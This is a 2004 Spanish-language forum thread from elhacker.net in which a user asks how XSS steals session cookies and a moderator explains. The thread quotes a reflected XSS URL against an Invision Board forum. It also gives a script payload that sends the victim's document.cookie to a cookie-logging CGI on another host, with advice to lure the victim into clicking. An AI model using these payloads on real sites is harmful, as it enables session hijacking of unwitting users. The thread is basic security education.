elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 16:01  


Tema destacado: Deseas probar algunas mejoras a la interfaz del foro? Prueba cake! acerca de

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderadores: zhyzura, kamsky, TRICKY)
| | | |-+  Dudas con Cross Site Scripting.....(XSS)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Dudas con Cross Site Scripting.....(XSS)  (Leído 532 veces)
cho

Desconectado Desconectado

Mensajes: 70


¡Amo YaBB SE!


Ver Perfil
Dudas con Cross Site Scripting.....(XSS)
« en: 7 Mayo 2004, 22:14 »

Hola........quiero aprender esta fornma de hack pero tengo unas preguntas muy simples  y puede que tontas :P

En un foro(INVISION BOARD) que quiero probar(mio) tiene una vuln de cross site scripting y me dice hacer esto

Código:
forum//index.php?s=&act=chat&pop=1;'><script>alert('this could be your cookie')</script

lo que no entiendo es que hacer?...xke yo se que el cross site script te da la cookie da la victima de la sesion que esta actualmente.....bueno....el caso es que no se si soy yo que tengo que entrar a esa URL o darle a mi victima esa URL .aki va la duda...si yo le doy esa url a mi victima le aparecera un script pero a ella...y lo que quiero es tener yo los datos de su cookie,........

Ahi el problema.....que no me servira de nada que la victima "caiga" si a lo ultimo los datos les aparecera a ella

Otra cosa...pense que en la url tenia que entrar yo,,,pero eso me dara mi propia cookie.....

Asi que toy en un lio

Aver si me respondeis claramente solo necesito aclarar esas 2 dudas.....no necesito leerme to un tuto para 2 preguntas xDD

weno ...eso es todo...espero que me podais ayudar

acias...
En línea
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 17.232


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Dudas con Cross Site Scripting.....(XSS)
« Respuesta #1 en: 8 Mayo 2004, 01:48 »

Citar
lo que no entiendo es que hacer?...xke yo se que el cross site script te da la cookie da la victima de la sesion que esta actualmente.....bueno....el caso es que no se si soy yo que tengo que entrar a esa URL o darle a mi victima esa URL .aki va la duda...si yo le doy esa url a mi victima le aparecera un script pero a ella...y lo que quiero es tener yo los datos de su cookie,........

Cierto. Debes conseguir que la víctima clickee la url y además, guardar su cookie o lo que sea en otro sitio.

La verdad es que cómo tu bien dices, en principio es una vulnerabilidad "poco grave".

Pero bueno, imaginate que con un poco de imagiación, hay un xss en ese forum y vienes a a este foro y escribes una url maliciosa para decir que entren....

Es evidente, que sólo con un alert del document.cookie, no te sirve de nada, puesto que ese alert sólo lo verá la víctima y ya conoce su cookie, pero en los xxs puedes añadir parámetros:

Código:
<script>document.location='http://www.elhacker.net/cgi-bin/cookie.cgi? '%20+document.cookie</script>


Esa url sería un simplet script que graba los datos de la cookie de la víctima, para después ser leídos por el atacante.

En este artículo en inglés está bien explicado:
http://www.cgisecurity.com/articles/xss-faq.shtml
En línea

"elhacker.net es único, por eso no fabrica para otras marcas"  - Prohibido prohibir

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Los Poderes Secretos de XSS (Cross Site Scripting) « 1 2 3 »
Tutoriales - Documentación
sirdarckcat 30 37,576 Último mensaje 1 Diciembre 2009, 08:36
por —Traffic.
Cross Site Scripting
Nivel Web
pelonms7 6 1,344 Último mensaje 7 Marzo 2011, 03:20
por pelonms7
DOM-based Cross-Site Scripting
Nivel Web
.:UND3R:. 2 1,884 Último mensaje 24 Noviembre 2011, 16:04
por WHK
Cross-site scripting en Skype
Noticias
wolfbcn 4 1,062 Último mensaje 18 Julio 2011, 12:35
por WHK
Cross Site Scripting en jQuery 1.6
Noticias
wolfbcn 0 1,077 Último mensaje 11 Septiembre 2011, 02:16
por wolfbcn
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines